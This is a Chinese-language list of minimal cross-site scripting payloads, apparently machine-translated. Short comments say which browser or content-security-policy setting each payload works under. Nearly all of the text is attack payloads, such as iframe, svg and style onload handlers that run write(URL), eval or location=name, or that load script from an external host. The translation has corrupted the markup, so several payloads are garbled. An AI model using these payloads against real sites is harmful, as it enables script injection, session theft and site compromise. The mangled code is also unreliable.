微小的XSS有效负载

！--如果您控制URL，则仅Safari-->；<；<；iframe/onload=write(URL)>；<；！--如果您控制URL-->；<；<；！--如果您控制URL-->；<；SVG/。！--如果您控制名称，但未启用不安全评估--&>；<；svg/onload=location=name；<；！--只是一个临时脚本-->；<；script/src=//NJ.₨&>；/script&>；<；！--如果您控制窗口名称-->；<；iframe/onload=src=。`'；+url)>；<；！--如果页面上的iframe数量不变-->；<；iframe/onload=src=top[0].name+/\NJ.₨？/<；<；！--仅适用于Firefox-->；<；iframe/srcdoc=&34；<；svg>；脚本/href。！--如果页面上的IFRAME数是随机的，如果csp中禁用了不安全的内联，则允许使用外部脚本--如果允许内联样式，则允许样式-->；<；-->；<；iframe/onload=src=contentWindow.name+/\NJ.₨？/>；<；！--/onLoad=-->；<；iframe/srcdoc="；<；script/src=//NJ.₨>；<；/script>；"；>；<；！--(Name)>；<；！--如果允许内联样式，则仅Safari-->；<；Style/onLoad=Write(Url)>；<；！--如果允许内联样式，并且在阻止内联样式时可以控制url-->；<；Style/onError=-->；<；style/onload=eval(`'；`+URL)>；<；！--(Name)>；<；！--使用外部脚本作为导入，在内部HTML中不起作用，除非Firefox-&<；！--PoC仅适用于HTTPS和Chrome，因为-->；<；svg/onload=import(/\\NJ.₨/)>；<；！--检查Sec-Fetch-Dest Header-->；<；style/onload=import(/\\NJ.₨/)>；<；！--使用外部脚本作为导入，如果允许内联样式则触发。<；！--PoC仅适用于HTTPS和Chrome，因为NJ.₨检查Sec-Fetch-Dest HeaderNJ.₨使用外部脚本作为导入-->；<；！--PoC仅适用于HTTPS和Chrome，因为NJ.₨会检查Sec-Fetch-Dest头--<；iframe/onload=IMPORT(/\\NJ.₨/)>；